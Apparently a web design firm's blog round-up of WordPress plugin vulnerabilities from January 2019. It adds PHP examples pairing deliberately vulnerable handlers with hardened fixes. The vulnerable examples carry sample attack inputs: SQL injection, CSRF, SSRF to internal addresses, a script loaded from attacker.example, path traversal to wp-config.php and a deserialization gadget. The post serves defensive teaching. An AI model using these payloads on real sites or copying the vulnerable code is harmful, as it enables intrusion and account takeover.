We take a lot of precautions when it comes to the safety and security of your website, but once we hand the website off to you, the burden of maintaining it falls on you. Nicely Done Sites offers a maintenance agreement so that we can continue to maintain your website and keep it as safe and secure as possible. We highly recommend that all of our clients purchase one, but it is not mandatory. If you do not, we hope that you at least keep your WordPress website, its plugins and its themes up to date, and in this series of posts we detail some of the vulnerabilities discovered recently.
So, to help you overcome your Super Bowl blues, here are the WordPress plugin vulnerabilities disclosed in January 2019.
Two-Factor Authentication
This is a Cross-Site Request Forgery (CSRF) vulnerability in a plugin that sets up two-factor authentication to increase a website's security. A missing nonce check (a nonce is a token tied to the logged-in user and to one specific action, which WordPress uses to protect URLs and forms from being submitted by anyone other than the user who was shown them) meant that an attacker could target someone logged into their WordPress site, get them to visit a specially crafted page in the same browser session, and have that page deactivate two-factor authentication, leaving the site protected only by the user's password. This took about three weeks to fix and was patched on January 8.
WP Auto Suggest
This vulnerability allowed an unauthenticated SQL injection, meaning no login was needed to exploit it. It took about a month to fix, and the plugin was also removed from download at the same time.
Google XML Sitemaps
With this XSS vulnerability, if multiple administrators manage a site with this plugin installed, one of them could store a script through the plugin that would then execute in another administrator's browser when they logged in and viewed the page. It took about 3 weeks to fix.
Baggage Freight Shipping Australia
Being in the US, chances are you do not have this plugin installed, but if you do, this vulnerability allowed unauthenticated users to upload files with any extension they chose, which is exactly what an attacker needs to place a PHP web shell on the server. This took about 2 weeks to fix.
Audio Record
This is another arbitrary file upload vulnerability, with the same consequences. It took about two weeks to fix.
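The two upload entries above share one shape: a handler that moves whatever was posted into a web-reachable directory under a name the caller chose. The following is an added example written for this post, not code from Baggage Freight Shipping Australia or Audio Record; the hook names and the audio-only allowlist are assumptions. It shows the vulnerable pattern and the hardened handler side by side, using WordPress's own upload helpers so the file's type is decided from its contents, not its name.

```php
<?php
// Added example, not the code of either plugin named above.
// Hook names (vulnerable_upload / hardened_upload) are placeholders.

// VULNERABLE: no login required (wp_ajax_nopriv_), no nonce, no capability
// check, and the attacker picks the file name and therefore the extension.
add_action( 'wp_ajax_nopriv_vulnerable_upload', 'vulnerable_upload' );
function vulnerable_upload() {
    $dir  = wp_upload_dir();
    // Attacker posts "shell.php"; it lands in wp-content/uploads, which the
    // web server executes as PHP.
    $name = basename( $_FILES['file']['name'] );
    move_uploaded_file( $_FILES['file']['tmp_name'], $dir['basedir'] . '/' . $name );
    wp_send_json_success( $dir['baseurl'] . '/' . $name );
}

// HARDENED: logged-in users only (no _nopriv hook), nonce and capability
// checks, and the type is verified from the bytes against a short allowlist.
add_action( 'wp_ajax_hardened_upload', 'hardened_upload' );
function hardened_upload() {
    check_ajax_referer( 'hardened_upload', 'nonce' );
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    if ( empty( $_FILES['file'] ) || UPLOAD_ERR_OK !== $_FILES['file']['error'] ) {
        wp_send_json_error( 'no file', 400 );
    }

    // Only the types this feature actually needs (assumed: an audio recorder).
    // A .php, .phtml or .html name can never match this list.
    $allowed = array( 'mp3' => 'audio/mpeg', 'wav' => 'audio/wav', 'ogg' => 'audio/ogg' );

    // Checks the real content type (via finfo) and the extension together.
    $check = wp_check_filetype_and_ext(
        $_FILES['file']['tmp_name'], $_FILES['file']['name'], $allowed
    );
    if ( ! $check['ext'] || ! $check['type'] ) {
        wp_send_json_error( 'file type not allowed', 415 );
    }

    // wp_handle_upload() sanitizes the file name, re-applies the mime
    // allowlist and stores the file under wp-content/uploads/YYYY/MM.
    $result = wp_handle_upload(
        $_FILES['file'],
        array( 'test_form' => false, 'mimes' => $allowed )
    );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( $result['error'], 400 );
    }
    wp_send_json_success( $result['url'] );
}
```

Two details matter beyond the allowlist: the hardened handler is registered only on the `wp_ajax_` hook, so anonymous visitors never reach it, and the check happens before the file is moved, so a rejected upload is never written anywhere the web server can serve it.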
Adicon Server
This is a SQL injection vulnerability in an older plugin used for icon management. It was fixed just after the New Year.
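Both SQL injection entries (WP Auto Suggest above and Adicon Server here) come down to request input being pasted into a query string. The following is an added example written for this post, not code from either plugin; the table and action names are assumptions. An autocomplete lookup is used because it is the natural place for this bug and because `LIKE` needs one extra step that plain placeholders do not cover.

```php
<?php
// Added example, not the code of WP Auto Suggest or Adicon Server.
// Table ({prefix}suggestions) and AJAX action names are placeholders.

// VULNERABLE: the search term is concatenated into SQL, and the endpoint
// is reachable without logging in (wp_ajax_nopriv_).
add_action( 'wp_ajax_nopriv_vuln_suggest', 'vuln_suggest' );
function vuln_suggest() {
    global $wpdb;
    // Constructed attacker input for ?term=:
    //   x%' UNION SELECT user_pass FROM wp_users WHERE user_login='admin' -- 
    // The closing quote ends the LIKE pattern and the rest becomes SQL.
    $term = $_GET['term'];
    $rows = $wpdb->get_results(
        "SELECT title FROM {$wpdb->prefix}suggestions WHERE title LIKE '%{$term}%' LIMIT 10"
    );
    wp_send_json( $rows );
}

// HARDENED: $wpdb->prepare() binds the value as a string, $wpdb->esc_like()
// neutralises % and _ so the user cannot widen the pattern, the length is
// bounded, and only one column is ever returned.
add_action( 'wp_ajax_nopriv_safe_suggest', 'safe_suggest' );
function safe_suggest() {
    global $wpdb;
    $term = isset( $_GET['term'] ) ? sanitize_text_field( wp_unslash( $_GET['term'] ) ) : '';
    if ( '' === $term || strlen( $term ) > 64 ) {
        wp_send_json( array() );
    }
    $like = '%' . $wpdb->esc_like( $term ) . '%';
    $sql  = $wpdb->prepare(
        "SELECT title FROM {$wpdb->prefix}suggestions WHERE title LIKE %s LIMIT %d",
        $like,
        10
    );
    wp_send_json( $wpdb->get_col( $sql ) );
}
```

The safe version still answers anonymous requests, because an autocomplete feature legitimately needs to; what changed is that the request can only ever supply a value, never SQL. Note that `esc_like()` is only correct when its output is then passed through `prepare()`, never echoed into the query directly.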
WP Job Manager
This is a Phar deserialization vulnerability through which any user with an account on the website could steal data and potentially take over the administrator account. It was fixed a little over 2 weeks after being discovered.
WooCommerce
This is an authenticated stored XSS vulnerability. It allowed an attacker to take over an account, give themselves shop manager privileges and eventually hijack the administrator account. The root cause is a common one: the information was sanitized when it was first stored in the database and was then treated as trusted, so it was never escaped again when it was displayed, even though a shop manager could modify it after the fact. The issue was fixed about 3 weeks after being discovered.
JSmol2WP
Two vulnerabilities were discovered in this plugin, which is used to place JSmol applets in WordPress. The first was an XSS vulnerability and the second was a Server-Side Request Forgery (SSRF) vulnerability, in which the server can be made to fetch arbitrary URLs on the attacker's behalf, including addresses that are only reachable from inside the hosting network. Both were patched within 2 days of discovery. The plugin was nonetheless pulled and is no longer available for download as of January 7.
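A viewer plugin that fetches a structure file for the browser is the classic SSRF shape: the server requests whatever URL it is told to and hands the body back. The following is an added example written for this post, not code from JSmol2WP; the hook names and the allowlisted host are assumptions. It shows the open proxy and a hardened version that restricts scheme and host, refuses internal addresses, and then still uses `wp_safe_remote_get()` as a second layer.

```php
<?php
// Added example, not JSmol2WP's code. Hook names and the host allowlist
// are placeholders.

// VULNERABLE: any scheme, any host, any port, no login required.
//   ?action=vuln_proxy&url=http://169.254.169.254/latest/meta-data/
//   ?action=vuln_proxy&url=http://127.0.0.1:8080/admin
add_action( 'wp_ajax_nopriv_vuln_proxy', 'vuln_proxy' );
function vuln_proxy() {
    $resp = wp_remote_get( $_GET['url'] );
    echo wp_remote_retrieve_body( $resp );
    wp_die();
}

// Returns true only for http(s) URLs on an allowlisted host that does not
// resolve to a private or reserved address.
function proxy_url_is_allowed( $url ) {
    $allowed_hosts = array( 'files.rcsb.org' );   // assumed: where structure files live
    $parts = wp_parse_url( $url );
    if ( empty( $parts['scheme'] ) || ! in_array( $parts['scheme'], array( 'http', 'https' ), true ) ) {
        return false;
    }
    if ( empty( $parts['host'] ) || ! in_array( strtolower( $parts['host'] ), $allowed_hosts, true ) ) {
        return false;
    }
    // Credentials or a custom port in the URL are never legitimate here.
    if ( isset( $parts['user'] ) || isset( $parts['pass'] ) || isset( $parts['port'] ) ) {
        return false;
    }
    // Resolve now and refuse 10/8, 172.16/12, 192.168/16, 127/8, 169.254/16 etc.,
    // so an allowlisted name pointed at an internal address is still rejected.
    $ip = gethostbyname( $parts['host'] );
    if ( $ip === $parts['host'] ) {
        return false;   // gethostbyname() returns the name unchanged on failure
    }
    return (bool) filter_var(
        $ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    );
}

// HARDENED: nonce, allowlist, no redirects, short timeout, plain-text reply.
add_action( 'wp_ajax_safe_proxy', 'safe_proxy' );
function safe_proxy() {
    check_ajax_referer( 'safe_proxy', 'nonce' );
    $url = isset( $_GET['url'] ) ? esc_url_raw( wp_unslash( $_GET['url'] ) ) : '';
    if ( ! proxy_url_is_allowed( $url ) ) {
        wp_send_json_error( 'url not allowed', 400 );
    }
    // wp_safe_remote_get() independently rejects local and private targets.
    // redirection => 0 stops an allowlisted host from bouncing us elsewhere.
    $resp = wp_safe_remote_get( $url, array( 'timeout' => 5, 'redirection' => 0 ) );
    if ( is_wp_error( $resp ) || 200 !== wp_remote_retrieve_response_code( $resp ) ) {
        wp_send_json_error( 'fetch failed', 502 );
    }
    header( 'Content-Type: text/plain; charset=utf-8' );
    echo wp_remote_retrieve_body( $resp );
    wp_die();
}
```

One caveat a practitioner should keep in mind: the address checked by `gethostbyname()` and the address the HTTP client later connects to come from two separate DNS lookups, so a host you do not control could in principle answer differently the second time. That is why the host allowlist, not the IP check, carries most of the weight here; the IP check is defence in depth.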
MapSVG Lite
Another CSRF vulnerability, this time in a plugin that lets you create different kinds of maps for your website. A REST request that modified data did not check the nonce value, which is what made the exploit possible. (REST, Representational State Transfer, is an architectural style for designing distributed systems and is mostly associated with HTTP; WordPress exposes its own REST API under /wp-json/.) This was fixed a day after being discovered.
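The Two-Factor Authentication and MapSVG Lite entries are the same bug in two dialects: a state-changing request that never verifies a nonce, so any page the victim visits can submit it with the victim's cookies. The following is an added example written for this post, not code from either plugin; the hook names, the user meta key, the REST namespace and the capabilities chosen are assumptions. It shows the classic admin-post form handler and the REST route, each in the vulnerable and hardened form.

```php
<?php
// Added example, not the code of the Two-Factor Authentication or MapSVG
// Lite plugins. Hook, meta and route names are placeholders.

// VULNERABLE (admin-post): a logged-in victim is all it takes. An attacker's
// page can auto-submit
//   <form action="https://victim.example/wp-admin/admin-post.php" method="post">
//     <input name="action" value="disable_2fa">
//   and the browser attaches the victim's WordPress cookies.
add_action( 'admin_post_disable_2fa', 'vuln_disable_2fa' );
function vuln_disable_2fa() {
    update_user_meta( get_current_user_id(), 'two_factor_enabled', 0 );
    wp_safe_redirect( admin_url( 'profile.php' ) );
    exit;
}

// HARDENED form: the nonce is bound to this action and this user.
function hardened_2fa_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    wp_nonce_field( 'disable_2fa_' . get_current_user_id(), '_disable_2fa_nonce' );
    echo '<input type="hidden" name="action" value="hardened_disable_2fa">';
    echo '<button>Disable two-factor</button></form>';
}

// HARDENED handler: nonce first (check_admin_referer dies on mismatch), then
// the capability, then the change. An attacker's page cannot read the nonce
// because it lives in the victim's own page and never reaches another origin.
add_action( 'admin_post_hardened_disable_2fa', 'hardened_disable_2fa' );
function hardened_disable_2fa() {
    $user_id = get_current_user_id();
    check_admin_referer( 'disable_2fa_' . $user_id, '_disable_2fa_nonce' );
    if ( ! current_user_can( 'edit_user', $user_id ) ) {
        wp_die( 'forbidden', 403 );
    }
    update_user_meta( $user_id, 'two_factor_enabled', 0 );
    wp_safe_redirect( admin_url( 'profile.php' ) );
    exit;
}

// REST variant (the MapSVG shape). permission_callback => '__return_true'
// would let anyone call this. With a real capability check, core only
// treats a cookie-authenticated caller as logged in when the request also
// carries X-WP-Nonce (wp_create_nonce('wp_rest')); a cross-site form cannot
// add that header, so it is treated as anonymous and refused here.
add_action( 'rest_api_init', function () {
    register_rest_route( 'maps-example/v1', '/map/(?P<id>\d+)', array(
        'methods'             => 'POST',
        'callback'            => 'hardened_update_map',
        'permission_callback' => function () {
            return current_user_can( 'edit_posts' );
        },
        'args' => array(
            'id' => array( 'validate_callback' => function ( $v ) { return is_numeric( $v ); } ),
        ),
    ) );
} );

function hardened_update_map( WP_REST_Request $req ) {
    $title = sanitize_text_field( $req->get_param( 'title' ) );
    update_post_meta( (int) $req->get_param( 'id' ), 'map_title', $title );
    return rest_ensure_response( array( 'ok' => true ) );
}
```

The order inside the hardened handler is deliberate: verify the nonce before doing anything else, then check what the user is allowed to do. A nonce proves the request came from a page WordPress served to this user; it does not prove the user is permitted to perform the action, so both checks are needed.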
User Registration
Another XSS vulnerability. It was fixed 4 days after discovery.
Spam Bye Bye
Yet another XSS vulnerability, which allowed a script to be executed that would give the attacker access to the setup page. It was fixed 3 days after discovery.
Easy Redirect Manager
Still another XSS vulnerability, in a plugin that redirects one URL to another. This is helpful if a website has multiple domains that need to be pointed at a single one. The vulnerability allowed an attacker to plant a script that ran when the site owner viewed the plugin's log file. This issue was fixed the following day.
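The XSS entries in this list (Google XML Sitemaps, WooCommerce, User Registration, Spam Bye Bye and Easy Redirect Manager) all fail the same way: something an untrusted party can write ends up in an administrator's page without being escaped at the point where it is printed. The following is an added example written for this post, not code from any of those plugins; the option and hook names are assumptions. It uses the redirect-log case, because a log is a place where attacker data is written without any login at all, and it shows why "it was sanitized when saved" (the WooCommerce reasoning above) does not protect the viewer.

```php
<?php
// Added example, not the code of any plugin listed above.
// Option and hook names are placeholders.

// Log writer: records every 404 hit. The Referer header is attacker-
// controlled and is stored verbatim (a log should keep what it saw).
add_action( 'template_redirect', 'example_log_404' );
function example_log_404() {
    if ( ! is_404() ) {
        return;
    }
    $log   = get_option( 'example_redirect_log', array() );
    $log[] = array(
        'time'    => time(),
        'path'    => isset( $_SERVER['REQUEST_URI'] ) ? $_SERVER['REQUEST_URI'] : '',
        'referer' => isset( $_SERVER['HTTP_REFERER'] ) ? $_SERVER['HTTP_REFERER'] : '',
    );
    update_option( 'example_redirect_log', array_slice( $log, -200 ) );
}

// VULNERABLE viewer: treats stored data as trusted HTML. A single request
// sent with
//   Referer: <script src="https://attacker.example/x.js"></script>
// runs with the administrator's session as soon as the log page is opened.
function vuln_render_log() {
    foreach ( get_option( 'example_redirect_log', array() ) as $row ) {
        echo '<tr><td>' . date( 'c', $row['time'] ) . '</td><td>' . $row['path']
           . '</td><td>' . $row['referer'] . '</td></tr>';
    }
}

// HARDENED viewer: every value is escaped for the context it is printed in,
// whatever happened at write time. Data read back from the database is input
// again, and whoever could edit it in the meantime (a shop manager, in the
// WooCommerce case) is not a trusted author.
function hardened_render_log() {
    foreach ( get_option( 'example_redirect_log', array() ) as $row ) {
        $referer = $row['referer'];
        // esc_url() returns '' for javascript:, data: and other non-web schemes,
        // so those fall through to plain text instead of becoming a link.
        $href = esc_url( $referer );
        echo '<tr>';
        echo '<td>' . esc_html( date( 'c', (int) $row['time'] ) ) . '</td>';
        echo '<td>' . esc_html( $row['path'] ) . '</td>';
        echo '<td>' . ( $href
            ? '<a href="' . $href . '" rel="noreferrer">' . esc_html( $referer ) . '</a>'
            : esc_html( $referer ) ) . '</td>';
        echo '</tr>';
    }
}
```

The rule the hardened viewer follows is "escape on output, by context": `esc_html()` for text nodes, `esc_attr()` for attribute values, `esc_url()` for `href`, `wp_kses_post()` only where limited HTML is genuinely wanted. Sanitizing on input is still worth doing, but it is a data-quality measure, not the control that stops XSS.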
Social Network Tabs
This vulnerability exposed the Twitter API credentials of users' accounts, including their access tokens, API key and secret key, in plain text in the page source. With that information an attacker can act as that Twitter account. The tokens are what let the plugin act on the account without the user logging in each time, so anyone who obtains them has the same access without ever needing the password. This issue was discovered on December 1, and the affected Twitter users were informed and had their keys revoked for security reasons. The vulnerability was made public in mid-January and was officially fixed the following day.
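Whatever a plugin passes to `wp_localize_script()` or echoes into a page is readable by every visitor with "view source", so the only safe place for a signing secret is the server. The following is an added example written for this post, not code from Social Network Tabs; the option, hook and endpoint names are assumptions, and the signer is the standard OAuth 1.0a HMAC-SHA1 scheme rather than anything specific to that plugin. It contrasts shipping the credentials to the browser with keeping them server-side and returning only the data the widget needs.

```php
<?php
// Added example, not Social Network Tabs' code. Option, hook and endpoint
// names are placeholders; the Twitter v1.1 endpoint shape is assumed.

// VULNERABLE: all four credentials are written into the page so the
// widget's JavaScript can call Twitter directly.
add_action( 'wp_enqueue_scripts', 'vuln_enqueue_tabs' );
function vuln_enqueue_tabs() {
    wp_enqueue_script( 'tabs-widget', plugins_url( 'widget.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'tabs-widget', 'tabsCfg', array(
        'consumer_key'        => get_option( 'tabs_consumer_key' ),
        'consumer_secret'     => get_option( 'tabs_consumer_secret' ),      // now in view-source
        'access_token'        => get_option( 'tabs_access_token' ),
        'access_token_secret' => get_option( 'tabs_access_token_secret' ),  // now in view-source
    ) );
}

// OAuth 1.0a Authorization header for a GET request (RFC 5849, HMAC-SHA1).
function oauth1_header( $url, array $query, array $c ) {
    $oauth = array(
        'oauth_consumer_key'     => $c['consumer_key'],
        'oauth_nonce'            => bin2hex( random_bytes( 16 ) ),
        'oauth_signature_method' => 'HMAC-SHA1',
        'oauth_timestamp'        => (string) time(),
        'oauth_token'            => $c['access_token'],
        'oauth_version'          => '1.0',
    );
    $params = array_merge( $query, $oauth );
    ksort( $params );
    $pairs = array();
    foreach ( $params as $k => $v ) {
        $pairs[] = rawurlencode( $k ) . '=' . rawurlencode( $v );
    }
    $base = 'GET&' . rawurlencode( $url ) . '&' . rawurlencode( implode( '&', $pairs ) );
    $key  = rawurlencode( $c['consumer_secret'] ) . '&' . rawurlencode( $c['access_token_secret'] );
    $oauth['oauth_signature'] = base64_encode( hash_hmac( 'sha1', $base, $key, true ) );
    ksort( $oauth );
    $parts = array();
    foreach ( $oauth as $k => $v ) {
        $parts[] = rawurlencode( $k ) . '="' . rawurlencode( $v ) . '"';
    }
    return 'OAuth ' . implode( ', ', $parts );
}

// HARDENED: the page receives only an endpoint and a nonce.
add_action( 'wp_enqueue_scripts', 'hardened_enqueue_tabs' );
function hardened_enqueue_tabs() {
    wp_enqueue_script( 'tabs-widget', plugins_url( 'widget.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'tabs-widget', 'tabsCfg', array(
        'endpoint' => admin_url( 'admin-ajax.php' ),
        'action'   => 'tabs_timeline',
        'nonce'    => wp_create_nonce( 'tabs_timeline' ),
    ) );
}

// The server signs the upstream call; credentials never leave this function.
add_action( 'wp_ajax_tabs_timeline', 'hardened_tabs_timeline' );
add_action( 'wp_ajax_nopriv_tabs_timeline', 'hardened_tabs_timeline' );
function hardened_tabs_timeline() {
    check_ajax_referer( 'tabs_timeline', 'nonce' );
    $cached = get_transient( 'tabs_timeline_cache' );
    if ( false !== $cached ) {
        wp_send_json_success( $cached );
    }
    $creds = array(
        'consumer_key'        => get_option( 'tabs_consumer_key' ),
        'consumer_secret'     => get_option( 'tabs_consumer_secret' ),
        'access_token'        => get_option( 'tabs_access_token' ),
        'access_token_secret' => get_option( 'tabs_access_token_secret' ),
    );
    $url   = 'https://api.twitter.com/1.1/statuses/user_timeline.json';
    $query = array( 'count' => '5', 'tweet_mode' => 'extended' );
    $resp  = wp_safe_remote_get( add_query_arg( $query, $url ), array(
        'timeout' => 5,
        'headers' => array( 'Authorization' => oauth1_header( $url, $query, $creds ) ),
    ) );
    if ( is_wp_error( $resp ) || 200 !== wp_remote_retrieve_response_code( $resp ) ) {
        wp_send_json_error( 'upstream error', 502 );
    }
    $items = array();
    foreach ( (array) json_decode( wp_remote_retrieve_body( $resp ), true ) as $t ) {
        $items[] = array( 'id' => $t['id_str'], 'text' => $t['full_text'] );   // only what the widget shows
    }
    set_transient( 'tabs_timeline_cache', $items, 5 * MINUTE_IN_SECONDS );
    wp_send_json_success( $items );
}
```

The transient cache is not just a performance nicety: because the endpoint is open to anonymous visitors (the widget appears on public pages), caching keeps a flood of requests from turning into a flood of signed calls against the account's API quota. If the credentials have ever been in a page, they should be treated as leaked and regenerated, which is what Twitter did for the affected accounts here.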
Download Ad Manager by WD
This was an arbitrary file download vulnerability, also known as path traversal. The plugin took a file name from the request and used it to locate a file or directory, and special path segments such as .. and / in that name allowed it to point outside the intended directory. If successful, an attacker can read restricted files. This vulnerability was fixed 5 days after being reported.
Health Check and Troubleshooting
Two vulnerabilities were discovered in this plugin. The first was an authenticated missing-authorization issue and the second an authenticated path traversal. Neither had sufficient checks on user permissions, making it possible for any logged-in user to perform any of the plugin's actions or read any file, such as wp-config.php, whose database credentials could let an attacker create login credentials of their own with administrative access. These were fixed a month after discovery.
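The Ad Manager and Health Check entries are one defect: a name from the request is joined onto a base directory and the result is read without confirming it still lies inside that directory. The following is an added example written for this post, not code from either plugin; the hook names and the ads directory are assumptions. It shows the traversal, a reusable containment check built on `realpath()`, and a hardened download handler that also checks who is asking.

```php
<?php
// Added example, not the code of Ad Manager by WD or Health Check &
// Troubleshooting. Hook names and the directory are placeholders.

// VULNERABLE: "../" segments walk out of the intended directory, and nobody
// is asked to log in.
//   ?action=vuln_download&file=../../../wp-config.php
//   (uploads/ads -> uploads -> wp-content -> site root)
add_action( 'wp_ajax_nopriv_vuln_download', 'vuln_download' );
function vuln_download() {
    $path = WP_CONTENT_DIR . '/uploads/ads/' . $_GET['file'];
    header( 'Content-Type: application/octet-stream' );
    readfile( $path );
    exit;
}

// Resolve the candidate and require it to stay under $base.
// Returns the canonical path, or false if it does not exist or escapes.
function path_within( $base, $candidate ) {
    $base = realpath( $base );
    $real = realpath( $base . DIRECTORY_SEPARATOR . $candidate );
    if ( false === $base || false === $real ) {
        return false;   // missing file, or a symlink that points elsewhere
    }
    $base = rtrim( $base, DIRECTORY_SEPARATOR ) . DIRECTORY_SEPARATOR;
    if ( 0 !== strncmp( $real, $base, strlen( $base ) ) ) {
        return false;   // resolved outside the directory
    }
    return $real;
}

// HARDENED: nonce and capability first (the Health Check bug skipped these),
// basename() so only files directly in the directory can be named, then the
// containment check on the resolved path, then a type check.
add_action( 'wp_ajax_hardened_download', 'hardened_download' );
function hardened_download() {
    check_ajax_referer( 'hardened_download', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'forbidden', 403 );
    }
    $name = isset( $_GET['file'] ) ? basename( wp_unslash( $_GET['file'] ) ) : '';
    $path = path_within( WP_CONTENT_DIR . '/uploads/ads', $name );
    if ( ! $path || ! is_file( $path ) || 'php' === strtolower( pathinfo( $path, PATHINFO_EXTENSION ) ) ) {
        wp_die( 'not found', 404 );
    }
    header( 'Content-Type: application/octet-stream' );
    header( 'Content-Disposition: attachment; filename="' . basename( $path ) . '"' );
    readfile( $path );
    exit;
}
```

`realpath()` is doing the real work: it collapses `..` segments and follows symlinks before the prefix comparison, so tricks that survive simple string filtering (`....//`, URL-encoded slashes, a symlink planted in the directory) are resolved to what the filesystem would actually open. The trailing separator appended to `$base` prevents `/uploads/ads-private` from passing as a child of `/uploads/ads`.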
Total Donations
This is an arbitrary option update vulnerability in an abandoned plugin, which gives an attacker a way into WordPress sites that run it. Numerous flaws expose the site's settings to manipulation from the outside: an attacker is potentially able to change any WordPress site setting, change the destination account for donations, or even retrieve email addresses from MailChimp mailing lists. The plugin has been abandoned and it is recommended that it be deleted. Do NOT just deactivate it, DELETE IT: deactivating leaves the plugin's files on the server, while deleting removes the code entirely. The developer is not responding and it is unlikely to be fixed.
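"Arbitrary option update" means a settings endpoint that lets the caller choose which row of wp_options to write, not just the value. Since wp_options holds the admin e-mail, the default role for new users and the site URL, that is effectively control of the site. The following is an added example written for this post, not code from Total Donations; the option and hook names are assumptions. It shows the open endpoint and a hardened one whose option names come from a fixed map, each with its own sanitizer.

```php
<?php
// Added example, not Total Donations' code. Option and hook names are
// placeholders.

// VULNERABLE: reachable without login, and both the option name and value
// come from the request. Constructed attacker request:
//   POST action=vuln_save_setting&name=default_role&value=administrator
// After that, registering a normal account yields an administrator.
add_action( 'wp_ajax_nopriv_vuln_save_setting', 'vuln_save_setting' );
function vuln_save_setting() {
    update_option( $_POST['name'], $_POST['value'] );
    wp_send_json_success();
}

// HARDENED: the plugin's own options, each paired with a sanitizer. Anything
// not in this map cannot be written through this endpoint.
function example_settings_schema() {
    return array(
        'donate_currency'   => function ( $v ) {
            return in_array( $v, array( 'USD', 'EUR', 'GBP' ), true ) ? $v : 'USD';
        },
        'donate_receiver'   => 'sanitize_email',
        'donate_thanks_msg' => 'sanitize_textarea_field',
        'donate_min_amount' => function ( $v ) {
            return max( 1, (int) $v );
        },
    );
}

add_action( 'wp_ajax_hardened_save_setting', 'hardened_save_setting' );
function hardened_save_setting() {
    check_ajax_referer( 'hardened_save_setting', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $schema = example_settings_schema();
    $name   = isset( $_POST['name'] ) ? sanitize_key( $_POST['name'] ) : '';
    if ( ! isset( $schema[ $name ] ) ) {
        wp_send_json_error( 'unknown setting', 400 );
    }
    $value = isset( $_POST['value'] ) && is_string( $_POST['value'] ) ? wp_unslash( $_POST['value'] ) : '';
    $clean = call_user_func( $schema[ $name ], $value );
    update_option( $name, $clean );
    wp_send_json_success( array( $name => $clean ) );
}
```

The allowlist is the control; the nonce and capability check are necessary but would not on their own stop a legitimate administrator's browser from being driven into writing `siteurl`. Keeping the sanitizer next to the option name also makes it obvious at review time what each setting is allowed to contain.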
Wise Chat
This is a reverse tabnabbing vulnerability. The plugin mishandled external links by opening them in a new tab without rel="noopener", so the page that opened could reach back and redirect the original tab, for example to a look-alike login page, which makes phishing attacks possible. It was fixed a day after being publicly disclosed.
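The fix for reverse tabnabbing is mechanical: every link that opens a new tab needs `rel="noopener"` (and usually `noreferrer`) so the opened page gets no `window.opener` to abuse. The following is an added example written for this post, not code from Wise Chat; the function name and the sample message are constructed. It is an output filter that repairs every `target="_blank"` link in a rendered chat message, which is the right place to apply the rule because users, not the plugin, author the links.

```php
<?php
// Added example, not Wise Chat's code. Function name and sample are placeholders.

// Takes an HTML fragment (one chat message, already passed through wp_kses
// or equivalent) and adds rel="noopener noreferrer" to each target="_blank"
// link, preserving any rel tokens that were already present.
function example_harden_external_links( $html ) {
    $doc = new DOMDocument();
    libxml_use_internal_errors( true );   // chat HTML is loose; do not emit warnings
    // The XML prologue fixes the charset; the <body> wrapper lets fragments parse.
    $doc->loadHTML( '<?xml encoding="utf-8"?><body>' . $html . '</body>' );
    libxml_clear_errors();

    foreach ( $doc->getElementsByTagName( 'a' ) as $a ) {
        if ( '_blank' !== strtolower( $a->getAttribute( 'target' ) ) ) {
            continue;
        }
        $rel = preg_split( '/\s+/', strtolower( trim( $a->getAttribute( 'rel' ) ) ), -1, PREG_SPLIT_NO_EMPTY );
        foreach ( array( 'noopener', 'noreferrer' ) as $token ) {
            if ( ! in_array( $token, $rel, true ) ) {
                $rel[] = $token;
            }
        }
        $a->setAttribute( 'rel', implode( ' ', $rel ) );
    }

    // Serialize only the body's children so the wrapper we added is not returned.
    $body = $doc->getElementsByTagName( 'body' )->item( 0 );
    $out  = '';
    foreach ( $body->childNodes as $child ) {
        $out .= $doc->saveHTML( $child );
    }
    return $out;
}

// Constructed sample: one external link opening a new tab, one internal link.
$message = 'see <a href="https://example.com/x" target="_blank">this</a> and <a href="/p">that</a>';
echo example_harden_external_links( $message );
```

On the sample, the first link gains `rel="noopener noreferrer"` and the second is left alone. WordPress core added `wp_targeted_link_rel()` in version 5.1 (released shortly after this round-up) to do the same for post content; a plugin rendering its own HTML still has to apply the rule to its own output.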
Yet Another Stars Rating
This is a PHP object injection vulnerability, from the same family as the Phar deserialization issue in WP Job Manager above. PHP allows developers to serialize objects so that they can be saved in a database for later use, and to load that information back it must be unserialized. If the serialized data comes from an attacker, the attacker chooses which class is instantiated and with what property values, and that class's magic methods then run with attacker-chosen data, which can potentially give an attacker access to the server or its information. This vulnerability was fixed two days after being made public.
There were no core vulnerabilities disclosed in January 2019.
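The WP Job Manager and Yet Another Stars Rating entries are two routes to the same outcome: PHP builds an object from bytes the attacker wrote. The following is an added example written for this post, not code from either plugin; the class, cookie and parameter names are assumptions. It defines one ordinary-looking class that happens to be a usable "gadget", shows it being triggered both by `unserialize()` on a cookie and by a plain `file_exists()` on a `phar://` path, and then the hardened alternatives.

```php
<?php
// Added example, not the code of WP Job Manager or Yet Another Stars Rating.
// Class, cookie and parameter names are placeholders.

// A harmless helper that exists somewhere in the codebase. Because it unlinks
// a file in __destruct, it is a gadget: create an instance with the right
// property and PHP performs the deletion when the object is destroyed.
class TempFileCleaner {
    public $path;
    public function __destruct() {
        if ( $this->path && is_file( $this->path ) ) {
            unlink( $this->path );
        }
    }
}

// VULNERABLE 1 (object injection): rating state kept in a cookie and restored
// with unserialize(). Constructed cookie value (before base64):
//   O:15:"TempFileCleaner":1:{s:4:"path";s:27:"/var/www/html/wp-config.php";}
// The destructor then removes wp-config.php at the end of the request.
function vuln_restore_state() {
    if ( empty( $_COOKIE['rating_state'] ) ) {
        return array();
    }
    return unserialize( base64_decode( $_COOKIE['rating_state'] ) );
}

// VULNERABLE 2 (phar deserialization): no unserialize() call at all. Any
// filesystem function on a phar:// URL parses the archive, and phar metadata
// is stored serialized. With an uploaded file whose bytes are a phar (the
// extension does not matter, a .jpg works), the attacker sends
//   ?file=phar:///var/www/html/wp-content/uploads/2019/01/cv.jpg/x
function vuln_file_exists_check() {
    return file_exists( $_GET['file'] );
}

// HARDENED 1: state that only ever contains data belongs in JSON, which has
// no notion of classes and therefore no magic methods.
function hardened_restore_state() {
    if ( empty( $_COOKIE['rating_state'] ) ) {
        return array();
    }
    $data = json_decode( base64_decode( $_COOKIE['rating_state'] ), true );
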